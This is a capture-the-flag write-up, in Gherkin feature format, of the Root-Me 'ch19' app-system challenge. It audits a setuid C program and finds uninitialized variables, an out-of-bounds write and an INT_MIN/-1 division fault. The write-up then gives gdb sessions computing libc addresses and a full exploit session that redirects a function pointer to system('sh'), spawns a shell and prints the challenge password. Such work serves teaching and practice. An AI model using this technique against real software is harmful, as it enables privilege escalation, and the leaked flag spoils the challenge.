## Version 2.0
## language: en

Feature: elf-x86-bug-hunting-several-issues
  Site:
    rootme
  Category:
    app-system
  User:
    M'baku
  Goal:
    Get shell and read the password

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04     |
    | GDB-pwndbg      | 1.1.0     |
  Machine information:
    Given I am accesing the challenge through its URL
    When I visit the link
    Then I see a description with the sentence "An exceptional salary?"
    And a statement
    """
    Audit this binary source code to find a flaw.
    """
    Then a program source code is delivered
    And indicates that you have all the protections activated

  Scenario: Sucess:Understanding the program
    Given I can read the source code
    Then I can identify how the program works superficially
    Then I start reading by the "main" function
    """
    int main(int argc, char **argv)
    {
        char *opt_name = NULL;

        if (argc > 1)
                opt_name = argv[1];

        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());
        sigsetup();

        do {
                compare(compute_average_salary(opt_name));
                memset(g.name, 0, sizeof g.name);
                printf("Try again? Yes=1, No=0: >>\n");
        } while (get_integer_from_user());

        return 0;
    }
    """
    Then It is possible pass an argument for the binary
    And sets real and effective user IDs of the calling process
    Then I see that it calls a function called sigsetup()
    Then examining that function
    """
    static void sigsetup(void)
    {
        struct sigaction sa;

        memset(&sa, 0, sizeof sa);
        sa.sa_sigaction = sighandler;
        sa.sa_flags = SA_SIGINFO;

        if ((sigaction(SIGABRT, &sa, NULL) < 0) ||
            (sigaction(SIGSEGV, &sa, NULL) < 0) ||
            (sigaction(SIGFPE, &sa, NULL) < 0) ||
            (sigaction(SIGILL, &sa, NULL) < 0))
                die();
    }
    """
    Then I realize that this function configures a signal-catching function
    And call that function in case any of these 4 signals are triggered
    """
    SIGABRT
    SIGSEGV
    SIGFPE
    SIGILL
    """
    And the signal-catching functions is sighandler()
    """
    static void sighandler(int signo, siginfo_t *siginfo, void *ctx_hdl)
    {
        ucontext_t *ctx = ctx_hdl;
        char buf[STRINGBUF_SIZE] = "";
        ssize_t offset = 0;

        (void) siginfo;

        printf("Signal handler [%p] reached!\n", (void *) sighandler);
     printf("Rollback?How many bytes do you want to jump, in [-16; 16]? >>\n");
        offset = get_integer_from_user();
        if (offset > 16 || offset < -16) {
                puts("What did I just say?!");
                die();
        }
        ctx->uc_mcontext.gregs[REG_EIP] += offset;

        printf("Just a little quiz.  What signal has been trapped? >>\n");
        get_string_from_user(buf, sizeof buf - 1);
        printf("Answer: \"%s\" (%d).\n", strsignal(signo), signo);
        if (0 == strcasecmp(buf, strsignal(signo))) {
                puts("At least you know what signal you triggered...");
                puts("There... take this cookie.");
        } else {
                printf("You're so ignorant... Please change your name to "
                       "avoid public shaming: >>\n");
                get_string_from_user(g.name, sizeof g.name - 1);
        }
    }
    """
    Then this function indicates that a signal has been triggered
    And use the internal structures of ucontext_t to control the return
    Then ask what the triggered signal was
    And if it is not correct ask for the name again
    Then continuing with main function
    Then I see a do..while() which internally operates with two functions
    """
    compare(compute_average_salary(const char * const opt_name))
    """
    Then analyzing compute_average_salary() function
    """
    static long compute_average_salary(const char * const opt_name)
    {
        long money, months, salary;

        if (opt_name) {
                snprintf(g.name, sizeof g.name, "%s", opt_name);
        } else {
                printf("Enter your name: >>\n");
                (void) fgets(g.name, sizeof g.name - 1, stdin);
                g.name[strcspn(g.name, "\n")] = '\0';
        }

      do {
           printf("How much money you earned this year so far (in EUR): >>\n");
           money = get_integer_from_user();
           printf("Number of paid months since january: >>\n");
           months = get_integer_from_user();
           if (0 == months) {
                 puts("Please provide a non-zero number of months.");
                 die();
           }
           salary = money / months;
        } while ((unsigned long) money < (unsigned long) months);

        printf("%s, you earned around %ldEUR/month!\n", g.name, salary);
        return salary;
    }
    """
    Then I notice that there is a structure "g"
    """
    static struct {
        unsigned slices[11];
        unsigned char n_slices;
        char name[STRINGBUF_SIZE];
    } g = {
        .slices = {
                /* Based on INSEE's numbers for France (2013)
                 * https://www.insee.fr/fr/statistiques/1370897 */
              0, 1200, 1342, 1471, 1609, 1772, 1974, 2244, 2682, 3544, UINT_MAX
        },
        .n_slices = 11,
        .name = "undefined",
    };
    """
    And the name is registered in g.name, it can be with argv[1] or by stdin
    Then asks how much money is earned per year and the number of months paid
    Then calculates the salary and if money is less than months
    Then it prints the g.name, salary and returns the salary
    Then looking at compare() function
    """
    static void compare(long salary)
    {
        tprint_func func;
        char *param;

        if (0 == strcmp(g.name, "sbrk")) {
                func = puts;
               if (NULL == (param = strdup("The best.  No question asked."))) {
                        func = (tprint_func) perror;
                        param = "strdup";
                }
                goto end;
        }

        for (size_t i = 0; i < g.n_slices; i++) {
                if ((unsigned) salary > g.slices[i])
                        continue;
                func = puts;
                if (asprintf(&param, "Great %s, you're in the %zuth decile!",
                             g.name, i) < 0) {
                        func = (tprint_func) perror;
                        param = "asprintf";
                }
                break;
        }

    end:
        printf("[+] func=%p, param=%s\n", (void *) func, param ? param : "");
        printf("[+] &func=%p, &param=%p\n", (void *) &func, (void *) &param);

        func(param);
        if (func != (tprint_func) perror)
                free(param);
    }
    """
    Then this function is simple too, first ask if the g.name is "sbrk"
    Then iterates to determine where its INSEE based salary is in decile
    And in that process saves the puts pointer and prints it
    Then I can say that the program, asks for a name, amount of money per year
    And the months paid
    Then calculates the salary and compares it with some INSEE values to
    Then show in which decile that salary is found.

  Scenario: Sucess:Finding and explaining the bugs
    Given that I have read the source code
    Then I was able to determine some interesting bugs
    And they are the following:
    """
    long money, months, salary; (uninitialized variables)
    buf[strlen(buf) - 1] = '\0'; (writing outside the limits of the buffer)
    salary = money / months; (Not correct division check)
    """
    Then the first bug, unintialized variables, is crucial because
    Then it is possible to overlap variables from another function
    """
    https://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Flake.pdf
    """
    Then with second bug can be overwrite the g.n_slices variable of g struct
    """
    static struct {
        unsigned slices[11];
        unsigned char n_slices;
        char name[STRINGBUF_SIZE];
    }
    """
    Then if buf is g.name and strlen(g.name) is zero
    Then g.name[-1] = '\0'
    And the negative index -1 matches the address of n_slices
    Then n_slices = '\0'
    And the third bug is possible trigger a SIGFPE signal with INT_MIN/-1
    Then as the variable type is long (32 bit) is an int regardless
    And the range of int is -2,147,483,648 (INT_MIN) to 2,147,483,647 (INT_MAX)
    And if money = -2147483648 (INT_MIN)
    And if months = -1
    Then salary is -2147483648/-1 = 2147483648 (exceeds the length of int)
    And triggers the SIGFPE

  Scenario: Sucess:Exploiting the bugs
    Given I recognize the bugs
    Then the plan is to get the puts pointer, calculate system address
    And any "sh" string pointer less than system address
    """
    do {
        ...
        ...
        salary = money / months;
        } while ((unsigned long) money < (unsigned long) months);
    """
    Then trigger the SIGFPE to set n_slices to 0, so it cannot enter the for
    And overlapp func, param variables with money and months
    Then i used gdb-pwndbg to find the pointer to the "sh" string
    """
    pwndbg> search sh
    ch19            0x565d0436 jae    0x565d04a0 /* 'shaming: >>' */
    ch19            0x565d1436 'shaming: >>'
    libc-2.27.so    0xf7d8a6d2 jae    0xf7d8a73c /* 'shell' */
    libc-2.27.so    0xf7d8aa16 jae    0xf7d8aa80 /* 'shell' */
    libc-2.27.so    0xf7d8ac8b jae    0xf7d8acf5 /* 'share' */
    libc-2.27.so    0xf7d8acd3 jae    0xf7d8ad3d /* 'sh' */
    libc-2.27.so    0xf7d8ad32 jae    0xf7d8ad9c /* 'sh' */
    """
    And calculate the address of system
    """
    pwndbg> p puts
    $1 = {int (const char *)} 0xf7dfbc10 <_IO_puts>
    pwndbg> vmmap
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x56628000 0x5662a000 r-xp     2000 0      /challenge/app-systeme/ch19/ch19
    0x5662a000 0x5662b000 r--p     1000 1000   /challenge/app-systeme/ch19/ch19
    0x5662b000 0x5662c000 rw-p     1000 2000   /challenge/app-systeme/ch19/ch19
    0x56ba2000 0x56bc4000 rw-p    22000 0      [heap]
    0xf7d94000 0xf7f69000 r-xp   1d5000 0      /lib/i386-linux-gnu/libc-2.27.so
    0xf7f69000 0xf7f6a000 ---p     1000 1d5000 /lib/i386-linux-gnu/libc-2.27.so
    0xf7f6a000 0xf7f6c000 r--p     2000 1d5000 /lib/i386-linux-gnu/libc-2.27.so
    0xf7f6c000 0xf7f6d000 rw-p     1000 1d7000 /lib/i386-linux-gnu/libc-2.27.so
    0xf7f6d000 0xf7f70000 rw-p     3000 0
    0xf7f87000 0xf7f89000 rw-p     2000 0
    0xf7f89000 0xf7f8c000 r--p     3000 0      [vvar]
    0xf7f8c000 0xf7f8e000 r-xp     2000 0      [vdso]
    0xf7f8e000 0xf7fb4000 r-xp    26000 0      /lib/i386-linux-gnu/ld-2.27.so
    0xf7fb4000 0xf7fb5000 r--p     1000 25000  /lib/i386-linux-gnu/ld-2.27.so
    0xf7fb5000 0xf7fb6000 rw-p     1000 26000  /lib/i386-linux-gnu/ld-2.27.so
    0xff98c000 0xff9ad000 rw-p    21000 0      [stack]
    pwndbg> p/x 0xf7dfbc10 - 0xf7d94000
    $2 = 0x67c10
    pwndbg> p system
    $3 = {int (const char *)} 0xf7dd1250 <__libc_system>
    pwndbg> p/x 0xf7dd1250 - 0xf7d94000
    $4 = 0x3d250
    pwndbg>
    """
    And ready
    Then it is only to send the payload to the program
    """
    app-systeme-ch19@challenge03:~$ ./ch19
    Enter your name: >>
    mbaku
    How much money you earned this year so far (in EUR): >>
    10
    Number of paid months since january: >>
    2
    mbaku, you earned around 5EUR/month!
    [+] func=0xf7e1dc10, param=Great mbaku, you're in the 1th decile!
    [+] &func=0xff9bc320, &param=0xff9bc324
    Great mbaku, you're in the 1th decile!
    Try again? Yes=1, No=0: >>
    1
    Enter your name: >>
    How much money you earned this year so far (in EUR): >>
    -2147483648
    Number of paid months since january: >>
    -1
    Signal handler [0x56646bb4] reached!
    Rollback?  How many bytes do you want to jump, in [-16; 16]? >>
    3
    Just a little quiz.  What signal has been trapped? >>
    ninguna
    Answer: "Floating point exception" (8).
    You're so ignorant... Please change your name to avoid public shaming: >>
    How much money you earned this year so far (in EUR): >>
    0xf7df3250
    Number of paid months since january: >>
    0xf7dc4cd3
    , you earned around 0EUR/month!
    [+] func=0xf7df3250, param=sh
    [+] &func=0xff9bc320, &param=0xff9bc324
    $ id
    uid=1219(app-systeme-ch19-cracked) gid=1119(app-systeme-ch19) groups=1119
    $ cat .passwd
    BUG_HUNT1NG_IS_SUP3R_C00L
    $
    """
    And voila!
